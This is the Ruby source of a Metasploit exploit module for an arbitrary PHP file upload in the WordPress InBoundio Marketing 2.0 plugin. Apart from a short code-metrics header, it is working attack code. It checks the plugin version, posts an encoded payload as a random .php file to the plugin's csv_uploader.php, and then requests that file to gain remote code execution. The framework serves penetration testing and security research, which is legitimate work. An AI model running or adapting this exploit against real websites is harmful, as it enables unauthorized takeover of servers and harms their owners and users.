modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb from rapid7/metasploit-framework

modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb
Summary

Maintainability

2 hrs
Test Coverage

Issues
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress InBoundio Marketing PHP Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary file upload in the WordPress InBoundio Marketing version
        2.0. It allows to upload arbitrary php files and get remote code execution. This module
        has been tested successfully on WordPress InBoundio Marketing 2.0.3 with Wordpress 4.1.3 on
        Ubuntu 14.04 Server.
      },
      'Author'         =>
        [
          'KedAns-Dz', # Vulnerability discovery
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['EDB', '36478'],
          ['OSVDB', '119890'],
          ['WPVDB', '7864']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['InBoundio Marketing 2.0', {}]],
      'DisclosureDate' => '2015-03-24',
      'DefaultTarget'  => 0)
    )
  end

  def check
    check_plugin_version_from_readme('inboundio-marketing')
  end

  def exploit
    php_page_name = rand_text_alpha(8 + rand(8)) + '.php'

    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{php_page_name}\"")
    post_data = data.to_s

    res = send_request_cgi(
      'uri'       => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'csv_uploader.php'),
      'method'    => 'POST',
      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
      'data'      => post_data
    )

    if res
      if res.code == 200 && res.body.include?(php_page_name)
        print_good("Our payload is at: #{php_page_name}.")
        register_files_for_cleanup(php_page_name)
      else
        fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'Server did not answer')
    end

    print_status("Calling payload...")
    send_request_cgi(
      { 'uri' => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'uploaded_csv', php_page_name) },
      5
    )
  end
end